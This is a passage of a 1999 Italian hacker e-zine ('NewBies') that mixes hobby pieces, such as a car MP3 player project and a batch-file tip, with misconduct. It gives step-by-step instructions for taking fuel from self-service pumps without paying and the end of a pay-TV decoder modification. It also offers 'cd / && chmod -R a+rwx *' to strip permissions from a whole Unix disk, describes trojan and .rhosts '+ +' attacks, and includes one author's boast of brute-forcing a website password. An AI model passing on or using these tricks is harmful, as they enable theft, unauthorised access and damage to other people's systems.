the left, this is the side of the micro-controller. - Locate pins 32 and 33 and scratch away the copper at both. - Locate pin 23 again and place a piece of solid core wire between pin 23 and ground (you can use the empty space of J835, see component side). Io ho un ComCrypt 4000 e non ci sono riuscito . . sigh sigh . . . Comunque quelli di Republic mi sembrano tipi seri e disponibili. Provate su un modello CableCrypt (dovrebbero essere i primi modelli usciti) e probabilmente avrete piu' fortuna di me. Ahhh! ho trovato un indirizzo! Dovrebbe essere l'home page di Peter "The Video Ripper" ecco qua: http://home.pi.net/~pluijer (non so se funziona ancora) Be' l'articolo sta per finire. Chiunque voglia scrivermi la mia mailbox: [email protected] Se qualcuno ha info serie sulla Tv via satellite (non solo t+) e terrestre si faccia sentire!! Tanti saluti e baci. JohnnyRunner "Il mio futuro e' nel passato e nel presente" Litfiba ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ BENZINA A GO G0! oVvEro devo fare benzina ma non ho soldi... Se per caso dovesse capitarvi di trovarvi con la macchina o con la moto senza benza e con poche migliaia di lire potete provare il seguente "trucchetto" ai distributori automatici. Dopo aver aperto il bocchetto della macchina (o moto) dove si inserisce la benzina, prendete la pompa e tenendo premuta la leva per farla scorrere, saltateci sopra ripetutamente ed energicamente. Con un po' di pazienza pian piano farete benzina grazie alla pressione che si viene a creare saltando sulla pompa (un mio amico, con una vecchia pompa, si è fatto il pieno di benzina dello scooter in circa 15 minuti!!!). Con i tipi di pompe che hanno il cassettino che raccoglie la benzina posto sopra (come il disegno di seguito) sono quelle da cui si puo' attingere piu' benzina dato che scende direttamente dall'alto. .-------------. []]]]]]]]]]| lire 88888 | [] | litri 88888 | [] .----------.--| [] | | [] | | [] | | [] | | ||__ | | ||_'| .------------.--| || / |-| |-| |-| | () | | | | | | | | () | |_| |_| |_| | | | .----------------. Occhio pero' a non farvi prendere per pazzi da chi passa dato che vi vedra' saltare come dei dannati! ;-) HarLoK Spazio saluti: tutti quelli che mi conoscono, la mia compagnia nonche' quella di sballo e i soliti Blinking, 3ph4Throx! Terror Keeper, Lord Of Destruction, Dante Alighieri, Nobody88, la Spaghetti Phreakers crew, Rigor Mortem, Devilnet, N0SF3RATU, CDP, Blum, compresi tutti gli altri) K-> ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Ciao a tutti io mi kiamo KarmAYogA e, come avrete capito ho scelto questo nick proprio xche' nella mia vita ogni cosa anke la piu' piccola cerco sempre di farla al massimo delle possibilita' e non metto mai un limite al possibile dato che come diceva qualcuno "Non credevo che era impossibile quando lo feci!!!". Andro' a scrivere questo breve articolo che spero sia utile a piu' gente possibile e se volete contattarmi scrivete a N0body88 che mi girera' tutte le decine di mail che ricevero' =) Questo tipo di attacchi, detta data driven, sono molto difficili da individuare a causa delle loro modalita' ed i vari firewall servono a ben poco contro questo tipo di attacchi. Faro' adesso una breve lista di esempi x definire meglio questa modalita' x attaccare che si basa piu' sul social engineering e sulla speranza che l'utente "bersagliato" sia ignorante, che non sul fatto di usare strane o nuove tecniche x sperimentare l'effettiva sicurezza di alcuni sistemi. Esempio numero 1: |__|> l'hacker / newbies si prepara un file pdf o postscript da usare x eseguire cose non molto belle sul pc dei poveri utenti creduloni. |__|> l'hacker / newbies manda una email ad un utente con, come attachment, un file postscript che sembra essere normale ma che invece andra' ad eseguire operazioni sui file senza che l'user se ne accorga. |__|> l'user, ignaro di tutto, eseguira' subito il file postscript. |__|> l'interprete postscript esegue le operazioni contenute nel file che aggiungono la voce "+ +" nel file .rhosts dello user. |__|> l'hacker / newbies esegue un rlogin sulla macchina dell'utente. Esempio numero 2: |__|> un utente scarica da un sito HTTP un file eseguibile. |__|> l'utente esegue il file sul proprio pc. |__|> il programma cancella tutti i file contenuti sulla macchina dell'utente oppure compie solamente delle operazioni malicious e manda x esempio una mail all'hacker/newbies contenente le password dell'ignaro utente. |__|> il programma immette un virus all'interno della macchina dell'utente se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un lamer e lamer rimarra' finche non cambia filosofia. Esempio numero 3: |__|> un utente scarica da un sito FTP un file eseguibile |__|> l'utente esegue il file sul proprio pc. |__|> il programma cancella tutti i file contenuti sulla macchina dell'utente oppure compie solamente delle operazioni malicious e manda x esempio una mail all'hacker/newbies contenente le password dell'ignaro utente. |__|> il programma immette un virus all'interno della macchina dell'utente se chi ha fatto il programma e' chi lo da in giro a questo scopo e' un lamer e lamer rimarra' finche non cambia filosofia. Esempio numero 4: |__|> questa cosa si vede moooolto spesso... su IRC qualcuno dice ad uno nuovo e un po' inesperto come ottenere un programma che: 1) lo aiutera' ad usare meglio il sistema oppure 2) lo fara' diventare un hacker in pochi secondi o 3) lo aiutera' a buttare giu0 chiunque in poki sec (tipo nuke) |__|> l'utente quindi attirato dalla proposta fatt si fara' passare il programma (con grn gioia del lamer) e lo eseguira' |__|> il programma cancellera' tutti file dello user e inviera' per email una copia del file delle password all'intruso (/etc/shadow o /etc/passwd) oppure si installera' nel sistema sotto forma di sniffer, x raccogliere password, sotto forma di trojan x aprire una porta, sotto forma di Esempio numero 5: |__|> in una pagina Web vi e' un bottone che dice "cliccare qui per infettare una macchina" (esiste veramente!) Questo e' il piu' stupido ma quant'e' vero iddio che esist ci posso mettere la mano sul fuoco xche' l'ho visto io su geocities ma adesso non c'e' piu' dato che andando giu' di brute force ho trovato la pass ho cancellato virus e pagine web e ho cambiato la pass...ognuno aiuta gli altri a modo suo ;) Byez Byex Byey KarmA_YogA "Cosa usi x hackare? io??? Uso la testa !!!!!!!!" Webmaster e Sysadmin of www.nonvelodico.it ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ------------------------------------------------------------------MP3 in auto: Fantasie oltre la realta' ------------------------------------------------------------------INGREDIENTI: un pc 486 da rottame e una scheda audio 16 bitz TEMPO PREVISTO: uggioso Eila' . .. tutto K? In questo articolo vorrei parlare di mp3: come portarli comodamente (?) in auto. Ormai tutti sanno che cosa sono gli Mp3, che software usare, tricchetracche . . OK. Frequentando un po' il newsgroup it.hobby.elettronica ho visto che qualcuno ha gia' messo un Pc in auto (collegato all'autoradio) per ascoltare Tanta musica ad alta qualita'. L'URL di questo studente di elettronica e' __________________ (mi raccomando . . . e' da visitare). In pratica in questo sito si vede il progetto di questo ragazzo (di cui non ricordo il nome) che e' riuscito a a mettere un Pentium in auto alimentandolo con un inverter 12/220. Per quanto riguarda i comandi e' stata adattata una tastiera ricavata da un laptop che e' stata collocata nelle vicinanze dello specchietto retrovisore. La sera stessa in cui ho dato un'occhiata al suo sito ho dormito poco esaltato da questo fantastico progetto. Ho pensato che, tutto sommato, occorre spendere non pochi soldi. Innanzitutto un Pc Pentium (anche 133, ma un pentium), poi un circuito inverter per elevare la tensione da 12 V in continua a 220 V in alternata necessaria al pc per funzionare correttamente. In questo articolo mi piacerebbe "fantasticare" un po' su come risparmiare un po' di soldi e avere ugualmente un buon impianto Mp3 in auto. Ecco quanto. LE TENSIONI Facendo 4 conti un inverter costa + o - L. 180.000 (azzz. . ..) e , a mia opinione, non e' molto conveniente. Certo che e' comodo, ma non costa poco e non consuma poco. Ecco lo schema delle tensioni AUTO 12V ------------------> CC INVERTER | PC |scheda madre ================= 220V ------------------> | +5,-5,+12,-12 | CA ======= CC ====== ALIMENTATORE sw (CA= corrente alternata; CC=corrente continua) In pratica, utilizzando un inverter, si passerebbe per i 220V canonici senza trarne alcun profitto. Se solo si riuscisse a ottenere i voltaggi appositi (+5,-5,+12,-12) si potrebbe ottenere un risparmio notevole di spazio levando l'alimentatore del PC. Inoltre il consumo di tutto l'impianto si ridurrebbe drasticamente. Per ottenere i voltaggi +5 e +12 non ci sono problemi, per quanto riguarda il -5 non ci dovrebbero essere gravi problemi: ma per -12????? (Ahhh!! Dimenticavo! +5,-5,+12,-12 V sono le tensioni necessarie alla scheda madre per alimentare tutte le periferiche del PC) Evitando di collegare le tensioni negative (-5 e -12 V) sicuramente il computer dovrebbe essere in grado di fare il boot, visto che l'Hdd utilizza solo la +12. Il problema + grande e' che la scheda audio non funzionerebbe correttamente riproducendo un suono in mono oppure, nei casi piu' cronici, non funzionando del tutto. Un'altra cosa che mi incuriosisce riguardo l'inverter e' il consumo di questo circuito. Quando ho visto il progetto di ________ mi sono accorto che tutto l'impianto MP3 era alloggiato in una Jeep (diesel) e quindi penso che lui non abbia avuto particolari problemi di alimentazione. Ma ve l'immaginate tutto quell'impianto sulla mia povera Uno 1000 ??? Secondo me dopo circa 40 secondi di utilizzo l'alternatore (sempre in funzione) si riufiuterebbe di collaborare con la batteria visto il carico Inverter+Alimentatore+Pc+Autoradio+Amplificatori ! Secondo me trovare una soluzione alternativa all'inverter sarebbe una gran cosa. Purtroppo le mie poche e povere nozioni di elettronica non mi permettono di far altro che aspettare qualche aiuto da Voi! Ricordo comunque le tensioni necessarie per un corretto funzionamento: +12,+5,-12,-5 V : chissa' se qualche lettore di newbies puo' darmi una mano! (o un'idea) Se solo si riuscisse a trovare questo aggeggino si potrebbe procedere cosi': (questa e' quasi pura fantasia!) contatti > __________________________________ <-- SchedaAudio/V _______________| |_____________________________< ----- Scheda Madre Si potrebbe sfilare la scheda audio dallo slot ISA e appoggiare la scheda audio sulla scheda madre fissandola adeguatamente. Saldando i contatti dello slot ISA ai contatti della scheda audio si risparmierebbe un casino di spazio!! Se la scheda madre ha l'audio integrato, ovviamente, tutto cio' non e' necessario. Tuttavia la scheda video deve essere ugualmente connessa alla MoBo poiche' il bios fa un Check prima di far partire il Pc. Quindi si dovrebbe ripetere la stessa operazione anche per la scheda video perche' altrimenti il Pc non partirebbe (sigh sigh). . . . . Qualche idea per togliere la Scheda Video??? Booooooooooo Vorrei provare questa "tecnica" dissacrando un vecchio 486 con 8 Mega di Ram senza CD e con un HD removibile da 2,1 Gb (il piatto forte del PC!) : chissa' se ci riusciro'! Be' questa era la parte piu' fantasiosa dell'articolo . . . ora la parte un po' piu' seria. CONFIGURAZIONE HARDWARE / SOFTWARE Secondo la mia opinione spendere un sacco di soldi per un impianto in macchina non vale la pena. Un buon vecchio 486 con 8 Mega di Ram potrebbe essere un buon affare e funzionare egregiamente. Come sistema operativo si potrebbe utilizzare mulinux (una mini distribuzione di linux) installata su Hdd. In alternativa si potrebbe ricompilare un kernel datato (sempre linux) che comunque supporta una SB 100% compatibile. Il kernel un po' vecchiotto garantirebbe il funzionamento dei programmi appositi senza la necessita' di avere svariati mega di ram o un processore pentium. Una configurazione ottimale del OS e' comunque essenziale per la buona riuscita del progetto. Per il sw di utilizzo il grezzo mpg123 o il piu' aggraziato (ma non troppo) freeamp potrebbero andare bene. Da dimenticare (con questa configurazione) programmi + complessi come x11amp o roba simile. Se non siete pratici con linux si potrebbe ottenere lo stesso risultato installando un Dos (meglio se FreeDos) e installare la versione apposita di Winamp per questo sistema operativo (non l'ho ancora vista ma so che e' in giro . . . probabilmente sul sito di Winamp (ma va??)) Be' per anche per questa volta e' tutto. Se ci sara' un seguito a questo articolo e' perche' sono riuscito a fare qualcosa di pratico. Ringrazio Sammy Power per la collaborazione pratica al progetto --- MP3 Fantasy ---. Ogni e-mail in proposito e' gradita all'indirizzo [email protected] In chat mi si trova verso le 19.00 o piu' tardi verso le 23.00 Ciao belli! JohnnyRunner ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ L'Uov0 De ColombO ! ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Beh...mini articolo per scrivere un piccolo trucchetto di cui all'inizio pochi conoscono l'esistenza.... deD to: Poll!...alle mie spalle che mi corregge l'articolo in realtime Vs-DeD to:Il treno che alle 16:00 parte...che balle ! Bene...avete un'account su di una freeshell...volete uploadarci un azzo di file ma l'ftp non c'Š...come fare ??? Aprite il file con il sorgente del file che volete uplodare con il normale notepad selezionate tutto il testo ed ora clickate col destro e scegliete copia. Entrate nella vostra shell, editate un nuovo file con o un qualsiasi altro editor di testo ed incollate il tutto...salvate il file con estensione .c chiudete e poi con gcc o cc o che caxxo volete compilatelo.... ( gcc -o cax.c cax ) ed avrete l'eseguibile di cax....'na stronzata....bye byeeeeee.....D4NT3 4L|GH|3R| !!!!! ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ QUALKE TRUCCO BY PIPPO CALO' ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ 1) MINI GUIDA A COME SPROTEGGERE TUTTO IL DISCO E FARE INCAZZARE IL ROOT ;) Questo per sproteggere tutto da tutti da questa directory giu' sotto per tutto l'albero (cioe' tutti i file e le dir degli *nix NOTA BY N0bodY88): chmod -R a+rwx * cd / && chmod -R a+rwx * Anke con questo comando infatti (sono equivalenti) si puo' sproteggere tutto il disco (ma solo se si e' root!!!) 2) MINI GUIDA A && E || COMANDOA && COMANDOB --> esegue il comando B solo se e' riuscito ad eseguire il comando A COMANDOA || COMANDOB --> esegue il comando B solo se NON e' riuscito ad eseguire il comando A 3) MINI GUIDA CON PRECISAZIONI SUI FILE .RHOSTS Il file .rhosts deve essere protetto PERLOMENO da scrittura contro g e o. Altrimenti non funziona l'entrata in remote. Temo anche che debba essere protetto da lettura. ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ UN PO' TRUCCHI CAZZATE E STRONZATE ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Ciao a tutti questo e' il vs N0bodY88 che vi parla dal suo portatile datogli in dotazione da una ditta che evidentemente se ne intende di pazzi hihihi. In queste poche righe vi daro' alcuni consigli non difficili e di sicuro non inediti ma che forse possono risultare utili. Eccoveli divisi in punti: 1) Immaginate di aver trovato posto in un azienda dove avete la vostra scrivania e il vostro telefono personale ma che si collega ad un centralino: ebbene come fare x connettersi ad internet? Per "scavalcare" (diciamo) il centralino basta far precedere il numero telefonico del vs provider nella vostra connessione di acceso remoto uno zero con due virgole. Esempio: --> connessione da casa --> 06880000 --> connessione dall'ufficio --> 0,,0688000 Semplice no ;) 2) come collegare 2 computer che non hanno schede di rete? Allora la soluzione e' semplice basta munirsi di un semplice cavetto uplink che andra' a connettere i due pc ( ovviamente =) ) sulla porta com1 o, tramite adattatore, alla com2 dopodiche' bastera' mandare in esecuzione su entrambi i pc collegati un programmino che si chiama LL3 e che potete trovare allegato al cavo seriale o che potete cmq procurarvi facilmente o sulla rete o mediante qualke amico smnanettone che abbia anke un minimo interesse sulle reti. Nel programma sopracitato LL3 basta: --> premere L e poi premere invio x muoversi dentro e fuori le varie dir --> premere C e poi premere invio x copiare file da un pc all'altro --> premere E e poi premere invio x cancellare dei file CONSIGLIO: se uno dei due pc e' un 486 e' consigliabile copiare un file alla volta...lo so...e' un po' na menata pero' cosi' non si impalla a causa della differenza di velocita' dei due pc... ;) 3) cosa fare nei momenti di noia in rete quando gli amici non ci sono e di hackare non c'avete la testa? Semplicemente passarsi sotto teleport i vari www.softpj.com e www.spippolatori.com senza lasciare neanche una immagine che poi se se ne accorgono vi fanno a fette hihihi e ricodate che noi impariamo x creare e non per rompere o cancellare. 4) ATTENZIONE !!! Se girate su irc state attenti che c'e' un buontempone che va in giro e domanda "vuoi vedere un mio video" il che non sarebbe rompiballe senonche' il video mandato da questo fantomatico simpaticone si rivela essere un file chiamato patch.exe che potete immaginare cos'e'...cmq il consiglio e' il solito okkio a non aprire niente che derivi da sconosciuti e okkio ai "re degli hacker" come questo =) tnx speciale a dante x la segnalazione di questo "pericolo pubblico" hihihi 5) Cosa e' un array ? So che e' una cazzata ma dato che ultimamente me l'hanno gia' chiesto in tre o quattro e quindi... Gli array sono strumenti utilizzati x memorizzare gruppi di elementi in una singola unita'. Gli array quindi sono in pratica degli insiemi di elementi aventi una comune caratteristica. Immaginate di fare un programma nel vostro linguaggio di programmazione preferito e di dover immettere in un database decine se non centinaia di dati dello stesso tipo (variabili numeriche, variabili di testo etc.)...cosa fate? Fate decine di dichiarazioni oppure (e qui vengono in aiuto gli array) create con una unica dichiarazione un insieme di dati che contiene tutti i vs dati in un unico array :) 6) Non dormite la notte all'incubo che qualcuno vi incul... vi invada l'orifice con qualke trojan o che vi entri nel vs win preferito e che vi formatti tutto? Niente paura c'e' un trucco semplicissimo x evitare questo e x dormire sonni tranquilli... tutto questo puo' essere infatti evitato con un passo semplicissimo ma anke un po' ingegnoso (e che, ci tengo a precisarlo, non lo ho inventato io e credo lo sappiano gia' in tanti). Basta infatti andare nella nostra cartella c:\windows\command e rinominare il ns buon vecchio format.com in formatt.com o cax.com o quellochevolete.com...sta a voi decidere e buone nottate ;) PS: si ringrazia Yago - Eugenio per avermi arrichito la conoscenza con questo trucchetto semplice (se non lo sai ;) ma moooooooooolto efficace. 7) Ed ora un piccolo trcchetto x quelli che creano e programmano in java e hanno appena cominciato e stanno usando un compilatore sotto dos. Il trucco consiste nel mettere le seguenti linee in un file e chiamarlo a.bat dopodiche' basta che quando volete provare un progetto appena finito basta che digitiate il comando "a nomemioprogetto" e uala'! ci siamo risparmiati un bel po' di ------inizio copiaincolla-------------------@echo off cls path c:\jbuilder\java\bin c:\jbuilder\java\bin\javac.exe %1.java c:\jbuilder\java\bin\appletviewer.exe %1.html ------fine copiaincolla---------------------!!!!!!ATTENZIONE IL PROSSIMO TRUCCO NON E' MIO MA E' UNA TRADUZIONE!!!!!! 8) Come mandare in crash il "famoso" browser web Opera? Ebbene basta una piccola cosa x far andare in crash sudetto programma e consiste nell'aggiungere un ulteriore slash a un qualsiasi indirizzo web. Piccolo esempio: http:/// PS: non so pero' se nelle ultime versioni ci sia ancora questo bug quindi che mi resta da dire oltre al fatto che l'autore del testo che ho tradotto non e' riportato nel testo stesso? Ah si'... ...tentar non nuoce...e com dice un amico di un mio amico mooolto maschilista (ma dire mooooolto e' dire poco) dice sempre "Tu vai dalla ragazza lo tiri fuori dalle mutande e glielo metti in mano... tanto qualsiasi cosa succeda non cade ;) E anche questo numero il mio art su cazzate trucchi e stronzate e' finito... ...quindi.. ...byez a tutti dal vostro redivivo N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ SALUTI ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Dedico questa e-zine a K4m4l30nt3, colui con il quale ho iniziato questa avventura e che ora non e' piu' tra noi.... dovunque tu sia questa e' per te fratello _--={ ø(^__^)ø }=--_ Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma non potete fermarci tutti... dopo tutto, siamo tutti curiosi uguali e con la stessa voglia di smanettare e di capire. +++Illo N0bodY88+++ January 16, 1999 Ok ora voglio fare anche io un mega salutone a Dark Schnaider [ complimenti x il sito ] , Biavo , w00w00 e tutti gli altri amici mirc che frequentemente vengono sul nostro beneamato canale #hackernow [ grazie di tutto cuore siete mitici ] . Ah mi dimenticavo una cosa .... Fanculo ai Lamer siete esseri immondi .... Come sono buono eh.. Io sono un newbies e questo e' il mio manifesto. Potete anche fermare me, ma almeno aspettate che abbia fermato tutti i lamer di questo universo, dopo tutto non siamo tutti uguali ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ _ _ ____ _ | \ | | _____ _| __ )(_) ___ ___ | \| |/ _ \ \ /\ / / _ \| |/ _ Y __| | |\ | __/\ V V /| |_) | | __|__ \ |_| \_|\___| \_/\_/ |____/|_|\___|___/ Webmaster by ---------> Redattori ------------> E-zine by ------------> Ascii by -------------> Loghi NewBies by -----> Articoli -------------> ZeroCool & T0rment0 & _p0nic0_ & HaRLoK & N0bodY88 N0bodY88 & ZeroCool & Dante Alighieri N0bodY88 & ZeroCool & NewBies Staff N0bodY88 & |-|15cR4zYm1nD & S0l1t4r10~M4N & 1mGvD RigoR MorteM NewBies Staff & Friends |-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|-_-|Fine e-zine: E anche questo numero e' giunto alla frutta quindi che dire...speriamo che vi sia piaciuto...e ora un po' di cose...buon compleanno a Raffi Crash....un grazie di cuore a drwxr-xr- x tutto il suo aiuto x NewBies e x la sua amicizia dimostrata in vari modi...tnx in modo molto speciale sia a Yago il mito che a RigoR MorteM che adesso mi ha pure trasmesso la passione x l'elettronica... cax che figata raga... N0bodY88
Documenti analoghi
Newbies 4
The price that society as aol and cable inwiry offer are very good in this
period we 've a price of 20USD for month for cable seven and about 80USD
for aol service..
I know that some place in usa ...
COMPUTERISED MORSE CODE GENERATOR/TRANSMITTER
(NE555) is connected to an FM transmitter comprising transistor T2 (BF194B) and
the associated components. The frequency
of the transmitter can be changed with
the help of trimmer capacitor VC1 or ...